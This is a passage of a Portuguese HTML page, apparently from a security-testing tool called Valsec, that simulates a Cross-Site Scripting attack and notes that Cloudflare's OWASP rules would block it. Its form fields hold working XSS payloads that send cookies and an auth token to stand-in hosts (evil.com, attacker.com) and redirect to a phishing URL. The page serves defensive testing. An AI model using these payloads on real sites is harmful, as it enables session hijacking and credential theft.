Este teste simula uma tentativa de injeção de scripts maliciosos que poderiam ser executados no navegador de outros usuários, permitindo roubo de sessões, redirecionamentos maliciosos ou outras ações não autorizadas.
Nome: <br>Comentário: <img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)"><br>Perfil: <script>var img=new Image();img.src='https://attacker.com/steal?data='+document.cookie;</script><br>Redirecionamento: javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))<br>Tema: default');document.location='https://evil.com/phish?token='+localStorage.getItem('auth_token');//</code> </div> </div> <div class="bg-red-900/30 border border-red-500/50 rounded-md p-4 mb-6"> <div class="flex items-start"> <svg class="w-6 h-6 text-red-500 mr-2" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"> <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M12 9v2m0 4h.01m-6.938 4h13.856c1.54 0 2.502-1.667 1.732-3L13.732 4c-.77-1.333-2.694-1.333-3.464 0L3.34 16c-.77 1.333.192 3 1.732 3z"></path> </svg> <div> <h3 class="text-lg font-medium text-red-400">Alerta de Segurança</h3> <p class="text-gray-300 mt-1">Este é um teste de segurança para verificar proteções contra ataques de Cross-Site Scripting. Em um ambiente real, este tipo de requisição seria bloqueado pelo Cloudflare OWASP Core Ruleset.</p> </div> </div> </div> <div class="flex justify-between"> <a href="/" class="inline-flex items-center px-4 py-2 bg-gray-700 hover:bg-gray-600 rounded-md transition-colors"> <svg class="w-4 h-4 mr-2" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"> <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 19l-7-7m0 0l7-7m-7 7h18"></path> </svg> Voltar </a> <span class="text-sm text-gray-400">Valsec - Versão: A</span> </div> </div> </div> </body> </html>